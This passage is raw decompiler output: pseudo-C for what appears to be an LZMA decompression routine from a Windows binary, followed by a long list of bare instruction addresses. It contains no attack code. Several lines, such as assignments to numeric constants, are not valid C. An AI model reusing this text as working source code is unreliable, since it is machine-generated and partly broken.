												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                                                              0x00000000
                                                                                              0x00406ffe
                                                                                              0x00406ffe
                                                                                              0x00407002
                                                                                              0x00407023
                                                                                              0x0040702a
                                                                                              0x00407030
                                                                                              0x00407036
                                                                                              0x00407048
                                                                                              0x0040704e
                                                                                              0x00407053
                                                                                              0x00000000
                                                                                              0x00407004
                                                                                              0x0040700a
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x004073ce
                                                                                              0x004073ce
                                                                                              0x004073ce
                                                                                              0x004073d4
                                                                                              0x004073da
                                                                                              0x004073e0
                                                                                              0x004073fa
                                                                                              0x004073fd
                                                                                              0x00407403
                                                                                              0x0040740e
                                                                                              0x00407410
                                                                                              0x004073e2
                                                                                              0x004073e2
                                                                                              0x004073f1
                                                                                              0x004073f5
                                                                                              0x004073f5
                                                                                              0x0040741a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040741c
                                                                                              0x00407420
                                                                                              0x004075cf
                                                                                              0x004075e5
                                                                                              0x004075ed
                                                                                              0x004075f4
                                                                                              0x004075f6
                                                                                              0x004075fd
                                                                                              0x00407601
                                                                                              0x00407601
                                                                                              0x0040742c
                                                                                              0x00407433
                                                                                              0x0040743b
                                                                                              0x0040743e
                                                                                              0x00407441
                                                                                              0x00407441
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00406be3
                                                                                              0x00406be3
                                                                                              0x00406be3
                                                                                              0x00406bec
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x00000000
                                                                                              0x00406bfd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c06
                                                                                              0x00406c09
                                                                                              0x00406c0c
                                                                                              0x00406c10
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c16
                                                                                              0x00406c19
                                                                                              0x00406c1b
                                                                                              0x00406c1c
                                                                                              0x00406c1f
                                                                                              0x00406c21
                                                                                              0x00406c22
                                                                                              0x00406c24
                                                                                              0x00406c27
                                                                                              0x00406c2c
                                                                                              0x00406c31
                                                                                              0x00406c3a
                                                                                              0x00406c4d
                                                                                              0x00406c50
                                                                                              0x00406c5c
                                                                                              0x00406c84
                                                                                              0x00406c86
                                                                                              0x00406c94
                                                                                              0x00406c94
                                                                                              0x00406c98
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c88
                                                                                              0x00406c8b
                                                                                              0x00406c8c
                                                                                              0x00406c8c
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c62
                                                                                              0x00406c67
                                                                                              0x00406c67
                                                                                              0x00406c70
                                                                                              0x00406c78
                                                                                              0x00406c7b
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c9e
                                                                                              0x00406c9e
                                                                                              0x00406ca2
                                                                                              0x0040754e
                                                                                              0x00000000
                                                                                              0x0040754e
                                                                                              0x00406cab
                                                                                              0x00406cbb
                                                                                              0x00406cbe
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc4
                                                                                              0x00406cc8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406cca
                                                                                              0x00406cd0
                                                                                              0x00406cfa
                                                                                              0x00406d00
                                                                                              0x00406d07
                                                                                              0x00000000
                                                                                              0x00406d07
                                                                                              0x00406cd6
                                                                                              0x00406cd9
                                                                                              0x00406cde
                                                                                              0x00406cde
                                                                                              0x00406ce9
                                                                                              0x00406cf1
                                                                                              0x00406cf4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d39
                                                                                              0x00406d3f
                                                                                              0x00406d42
                                                                                              0x00406d4f
                                                                                              0x00406d57
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d0e
                                                                                              0x00406d0e
                                                                                              0x00406d12
                                                                                              0x0040755d
                                                                                              0x00000000
                                                                                              0x0040755d
                                                                                              0x00406d1e
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d2c
                                                                                              0x00406d2f
                                                                                              0x00406d32
                                                                                              0x00406d37
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004073ce
                                                                                              0x004073ce
                                                                                              0x004073d4
                                                                                              0x004073da
                                                                                              0x004073e0
                                                                                              0x004073fa
                                                                                              0x004073fd
                                                                                              0x00407403
                                                                                              0x0040740e
                                                                                              0x00407410
                                                                                              0x004073e2
                                                                                              0x004073e2
                                                                                              0x004073f1
                                                                                              0x004073f5
                                                                                              0x004073f5
                                                                                              0x0040741a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d5f
                                                                                              0x00406d61
                                                                                              0x00406d64
                                                                                              0x00406dd5
                                                                                              0x00406dd8
                                                                                              0x00406ddb
                                                                                              0x00406de2
                                                                                              0x00406dec
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x004073cb
                                                                                              0x00406d66
                                                                                              0x00406d6a
                                                                                              0x00406d6d
                                                                                              0x00406d6f
                                                                                              0x00406d72
                                                                                              0x00406d75
                                                                                              0x00406d77
                                                                                              0x00406d7a
                                                                                              0x00406d7c
                                                                                              0x00406d81
                                                                                              0x00406d84
                                                                                              0x00406d87
                                                                                              0x00406d8b
                                                                                              0x00406d92
                                                                                              0x00406d95
                                                                                              0x00406d9c
                                                                                              0x00406da0
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406dac
                                                                                              0x00406daf
                                                                                              0x00406dcd
                                                                                              0x00406dcf
                                                                                              0x00000000
                                                                                              0x00406db1
                                                                                              0x00406db1
                                                                                              0x00406db4
                                                                                              0x00406db7
                                                                                              0x00406dba
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbf
                                                                                              0x00406dc2
                                                                                              0x00406dc4
                                                                                              0x00406dc5
                                                                                              0x00406dc8
                                                                                              0x00000000
                                                                                              0x00406dc8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407068
                                                                                              0x0040706c
                                                                                              0x0040708f
                                                                                              0x00407092
                                                                                              0x00407095
                                                                                              0x0040709f
                                                                                              0x0040706e
                                                                                              0x0040706e
                                                                                              0x00407071
                                                                                              0x00407074
                                                                                              0x00407077
                                                                                              0x00407084
                                                                                              0x00407087
                                                                                              0x00407087
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x004070ab
                                                                                              0x004070af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070b5
                                                                                              0x004070b9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070bf
                                                                                              0x004070c1
                                                                                              0x004070c5
                                                                                              0x004070c5
                                                                                              0x004070c8
                                                                                              0x004070cc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040711c
                                                                                              0x00407120
                                                                                              0x00407127
                                                                                              0x0040712a
                                                                                              0x0040712d
                                                                                              0x00407137
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00407122
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407143
                                                                                              0x00407147
                                                                                              0x0040714e
                                                                                              0x00407151
                                                                                              0x00407154
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407157
                                                                                              0x0040715a
                                                                                              0x0040715d
                                                                                              0x0040715d
                                                                                              0x00407160
                                                                                              0x00407163
                                                                                              0x00407166
                                                                                              0x00407166
                                                                                              0x00407169
                                                                                              0x00407170
                                                                                              0x00407175
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407203
                                                                                              0x00407203
                                                                                              0x00407207
                                                                                              0x004075a5
                                                                                              0x00000000
                                                                                              0x004075a5
                                                                                              0x0040720d
                                                                                              0x00407210
                                                                                              0x00407213
                                                                                              0x00407217
                                                                                              0x0040721a
                                                                                              0x00407220
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407225
                                                                                              0x00407228
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406df8
                                                                                              0x00406df8
                                                                                              0x00406dfc
                                                                                              0x00407569
                                                                                              0x00000000
                                                                                              0x00407569
                                                                                              0x00406e02
                                                                                              0x00406e05
                                                                                              0x00406e08
                                                                                              0x00406e0c
                                                                                              0x00406e0f
                                                                                              0x00406e15
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e1a
                                                                                              0x00406e1d
                                                                                              0x00406e1d
                                                                                              0x00406e20
                                                                                              0x00406e23
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406e29
                                                                                              0x00406e2f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406e35
                                                                                              0x00406e35
                                                                                              0x00406e39
                                                                                              0x00406e3c
                                                                                              0x00406e3f
                                                                                              0x00406e42
                                                                                              0x00406e45
                                                                                              0x00406e46
                                                                                              0x00406e49
                                                                                              0x00406e4b
                                                                                              0x00406e51
                                                                                              0x00406e54
                                                                                              0x00406e57
                                                                                              0x00406e5a
                                                                                              0x00406e5d
                                                                                              0x00406e60
                                                                                              0x00406e63
                                                                                              0x00406e7f
                                                                                              0x00406e82
                                                                                              0x00406e85
                                                                                              0x00406e88
                                                                                              0x00406e8f
                                                                                              0x00406e93
                                                                                              0x00406e95
                                                                                              0x00406e99
                                                                                              0x00406e65
                                                                                              0x00406e65
                                                                                              0x00406e69
                                                                                              0x00406e71
                                                                                              0x00406e76
                                                                                              0x00406e78
                                                                                              0x00406e7a
                                                                                              0x00406e7a
                                                                                              0x00406e9c
                                                                                              0x00406ea3
                                                                                              0x00406ea6
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00000000
                                                                                              0x00406eb1
                                                                                              0x00406eb1
                                                                                              0x00406eb5
                                                                                              0x00407575
                                                                                              0x00000000
                                                                                              0x00407575
                                                                                              0x00406ebb
                                                                                              0x00406ebe
                                                                                              0x00406ec1
                                                                                              0x00406ec5
                                                                                              0x00406ec8
                                                                                              0x00406ece
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed3
                                                                                              0x00406ed6
                                                                                              0x00406ed6
                                                                                              0x00406ed6
                                                                                              0x00406edc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406ede
                                                                                              0x00406ee1
                                                                                              0x00406ee4
                                                                                              0x00406ee7
                                                                                              0x00406eea
                                                                                              0x00406eed
                                                                                              0x00406ef0
                                                                                              0x00406ef3
                                                                                              0x00406ef6
                                                                                              0x00406ef9
                                                                                              0x00406efc
                                                                                              0x00406f14
                                                                                              0x00406f17
                                                                                              0x00406f1a
                                                                                              0x00406f1d
                                                                                              0x00406f1d
                                                                                              0x00406f20
                                                                                              0x00406f24
                                                                                              0x00406f26
                                                                                              0x00406efe
                                                                                              0x00406efe
                                                                                              0x00406f06
                                                                                              0x00406f0b
                                                                                              0x00406f0d
                                                                                              0x00406f0f
                                                                                              0x00406f0f
                                                                                              0x00406f29
                                                                                              0x00406f30
                                                                                              0x00406f33
                                                                                              0x00000000
                                                                                              0x00406f35
                                                                                              0x00000000
                                                                                              0x00406f35
                                                                                              0x00406f33
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f75
                                                                                              0x00406f75
                                                                                              0x00406f79
                                                                                              0x00407581
                                                                                              0x00000000
                                                                                              0x00407581
                                                                                              0x00406f7f
                                                                                              0x00406f82
                                                                                              0x00406f85
                                                                                              0x00406f89
                                                                                              0x00406f8c
                                                                                              0x00406f92
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f97
                                                                                              0x00406f9a
                                                                                              0x00406f9a
                                                                                              0x00406fa0
                                                                                              0x00406f3e
                                                                                              0x00406f3e
                                                                                              0x00406f41
                                                                                              0x00000000
                                                                                              0x00406f41
                                                                                              0x00406fa2
                                                                                              0x00406fa2
                                                                                              0x00406fa5
                                                                                              0x00406fa8
                                                                                              0x00406fab
                                                                                              0x00406fae
                                                                                              0x00406fb1
                                                                                              0x00406fb4
                                                                                              0x00406fb7
                                                                                              0x00406fba
                                                                                              0x00406fbd
                                                                                              0x00406fc0
                                                                                              0x00406fd8
                                                                                              0x00406fdb
                                                                                              0x00406fde
                                                                                              0x00406fe1
                                                                                              0x00406fe1
                                                                                              0x00406fe4
                                                                                              0x00406fe8
                                                                                              0x00406fea
                                                                                              0x00406fc2
                                                                                              0x00406fc2
                                                                                              0x00406fca
                                                                                              0x00406fcf
                                                                                              0x00406fd1
                                                                                              0x00406fd3
                                                                                              0x00406fd3
                                                                                              0x00406fed
                                                                                              0x00406ff4
                                                                                              0x00406ff7
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00407286
                                                                                              0x00407286
                                                                                              0x0040728a
                                                                                              0x004075b1
                                                                                              0x00000000
                                                                                              0x004075b1
                                                                                              0x00407290
                                                                                              0x00407293
                                                                                              0x00407296
                                                                                              0x0040729a
                                                                                              0x0040729d
                                                                                              0x004072a3
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407056
                                                                                              0x00407056
                                                                                              0x00407059
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x00407395
                                                                                              0x00407399
                                                                                              0x004073bb
                                                                                              0x004073be
                                                                                              0x004073c8
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x0040739b
                                                                                              0x0040739e
                                                                                              0x004073a2
                                                                                              0x004073a5
                                                                                              0x004073a5
                                                                                              0x004073a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407452
                                                                                              0x00407456
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x0040747b
                                                                                              0x00407482
                                                                                              0x00407489
                                                                                              0x00407489
                                                                                              0x00000000
                                                                                              0x00407489
                                                                                              0x00407458
                                                                                              0x0040745b
                                                                                              0x0040745e
                                                                                              0x00407461
                                                                                              0x00407468
                                                                                              0x004073ac
                                                                                              0x004073ac
                                                                                              0x004073af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407543
                                                                                              0x00407546
                                                                                              0x00407447
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040717d
                                                                                              0x0040717f
                                                                                              0x00407186
                                                                                              0x00407187
                                                                                              0x00407189
                                                                                              0x0040718c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407194
                                                                                              0x00407197
                                                                                              0x0040719a
                                                                                              0x0040719c
                                                                                              0x0040719e
                                                                                              0x0040719e
                                                                                              0x0040719f
                                                                                              0x004071a2
                                                                                              0x004071a9
                                                                                              0x004071ac
                                                                                              0x004071ba
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407490
                                                                                              0x00407490
                                                                                              0x00407493
                                                                                              0x0040749a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040749f
                                                                                              0x0040749f
                                                                                              0x004074a3
                                                                                              0x004075db
                                                                                              0x00000000
                                                                                              0x004075db
                                                                                              0x004074a9
                                                                                              0x004074ac
                                                                                              0x004074af
                                                                                              0x004074b3
                                                                                              0x004074b6
                                                                                              0x004074bc
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074c1
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c7
                                                                                              0x004074c7
                                                                                              0x004074cb
                                                                                              0x0040752b
                                                                                              0x0040752e
                                                                                              0x00407533
                                                                                              0x00407534
                                                                                              0x00407536
                                                                                              0x00407538
                                                                                              0x0040753b
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00000000
                                                                                              0x0040744d
                                                                                              0x00407447
                                                                                              0x004074cd
                                                                                              0x004074d3
                                                                                              0x004074d6
                                                                                              0x004074d9
                                                                                              0x004074dc
                                                                                              0x004074df
                                                                                              0x004074e2
                                                                                              0x004074e5
                                                                                              0x004074e8
                                                                                              0x004074eb
                                                                                              0x004074ee
                                                                                              0x00407507
                                                                                              0x0040750a
                                                                                              0x0040750d
                                                                                              0x00407510
                                                                                              0x00407514
                                                                                              0x00407516
                                                                                              0x00407516
                                                                                              0x00407517
                                                                                              0x0040751a
                                                                                              0x004074f0
                                                                                              0x004074f0
                                                                                              0x004074f8
                                                                                              0x004074fd
                                                                                              0x004074ff
                                                                                              0x00407502
                                                                                              0x00407502
                                                                                              0x0040751d
                                                                                              0x00407524
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x004071c2
                                                                                              0x004071c5
                                                                                              0x004071fb
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732e
                                                                                              0x0040732e
                                                                                              0x00407331
                                                                                              0x00407333
                                                                                              0x004075bd
                                                                                              0x00000000
                                                                                              0x004075bd
                                                                                              0x00407339
                                                                                              0x0040733c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407342
                                                                                              0x00407346
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00000000
                                                                                              0x00407349
                                                                                              0x004071c7
                                                                                              0x004071c9
                                                                                              0x004071cb
                                                                                              0x004071cd
                                                                                              0x004071d0
                                                                                              0x004071d1
                                                                                              0x004071d3
                                                                                              0x004071d5
                                                                                              0x004071d8
                                                                                              0x004071db
                                                                                              0x004071f1
                                                                                              0x004071f6
                                                                                              0x0040722e
                                                                                              0x0040722e
                                                                                              0x00407232
                                                                                              0x0040725e
                                                                                              0x00407260
                                                                                              0x00407267
                                                                                              0x0040726a
                                                                                              0x0040726d
                                                                                              0x0040726d
                                                                                              0x00407272
                                                                                              0x00407272
                                                                                              0x00407274
                                                                                              0x00407277
                                                                                              0x0040727e
                                                                                              0x00407281
                                                                                              0x004072ae
                                                                                              0x004072ae
                                                                                              0x004072b1
                                                                                              0x004072b4
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00000000
                                                                                              0x00407328
                                                                                              0x004072b6
                                                                                              0x004072bc
                                                                                              0x004072bf
                                                                                              0x004072c2
                                                                                              0x004072c5
                                                                                              0x004072c8
                                                                                              0x004072cb
                                                                                              0x004072ce
                                                                                              0x004072d1
                                                                                              0x004072d4
                                                                                              0x004072d7
                                                                                              0x004072f0
                                                                                              0x004072f2
                                                                                              0x004072f5
                                                                                              0x004072f6
                                                                                              0x004072f9
                                                                                              0x004072fb
                                                                                              0x004072fe
                                                                                              0x00407300
                                                                                              0x00407302
                                                                                              0x00407305
                                                                                              0x00407307
                                                                                              0x0040730a
                                                                                              0x0040730e
                                                                                              0x00407310
                                                                                              0x00407310
                                                                                              0x00407311
                                                                                              0x00407314
                                                                                              0x00407317
                                                                                              0x004072d9
                                                                                              0x004072d9
                                                                                              0x004072e1
                                                                                              0x004072e6
                                                                                              0x004072e8
                                                                                              0x004072eb
                                                                                              0x004072eb
                                                                                              0x0040731a
                                                                                              0x00407321
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00407321
                                                                                              0x00407234
                                                                                              0x00407237
                                                                                              0x00407239
                                                                                              0x0040723c
                                                                                              0x0040723f
                                                                                              0x00407242
                                                                                              0x00407244
                                                                                              0x00407247
                                                                                              0x0040724a
                                                                                              0x0040724a
                                                                                              0x0040724d
                                                                                              0x0040724d
                                                                                              0x00407250
                                                                                              0x00407257
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407257
                                                                                              0x004071dd
                                                                                              0x004071e0
                                                                                              0x004071e2
                                                                                              0x004071e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f44
                                                                                              0x00406f44
                                                                                              0x00406f48
                                                                                              0x0040758d
                                                                                              0x00000000
                                                                                              0x0040758d
                                                                                              0x00406f4e
                                                                                              0x00406f51
                                                                                              0x00406f54
                                                                                              0x00406f57
                                                                                              0x00406f5a
                                                                                              0x00406f5d
                                                                                              0x00406f60
                                                                                              0x00406f62
                                                                                              0x00406f65
                                                                                              0x00406f68
                                                                                              0x00406f6b
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070cf
                                                                                              0x004070cf
                                                                                              0x004070d3
                                                                                              0x00407599
                                                                                              0x00000000
                                                                                              0x00407599
                                                                                              0x004070d9
                                                                                              0x004070dc
                                                                                              0x004070df
                                                                                              0x004070e2
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e7
                                                                                              0x004070ea
                                                                                              0x004070ed
                                                                                              0x004070f0
                                                                                              0x004070f3
                                                                                              0x004070f6
                                                                                              0x004070f7
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070fc
                                                                                              0x004070ff
                                                                                              0x00407102
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407108
                                                                                              0x0040710a
                                                                                              0x0040710a
